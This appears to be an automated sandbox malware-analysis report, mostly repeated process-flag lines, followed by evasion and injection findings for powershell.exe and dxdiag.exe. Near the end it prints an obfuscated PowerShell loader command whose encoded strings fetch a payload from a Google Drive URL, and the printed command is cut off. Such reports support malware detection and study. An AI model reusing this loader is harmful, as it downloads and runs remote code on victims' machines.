Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\dxdiag.exe API/Special instruction interceptor: Address: 41036E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5448 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4463 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7137 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2345 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Window / User API: threadDelayed 3696 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 8120 Thread sleep count: 3696 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5916 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe Thread sleep count: Count: 3696 delay: -5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Thread delayed: delay time: 60000 Jump to behavior
Source: powershell.exe, 00000008.00000002.1468130265.000001AB7B270000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBo
Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 25_2_02F022ED LdrInitializeThunk, 25_2_02F022ED

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_7364.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F00000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2ECFAF4 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe 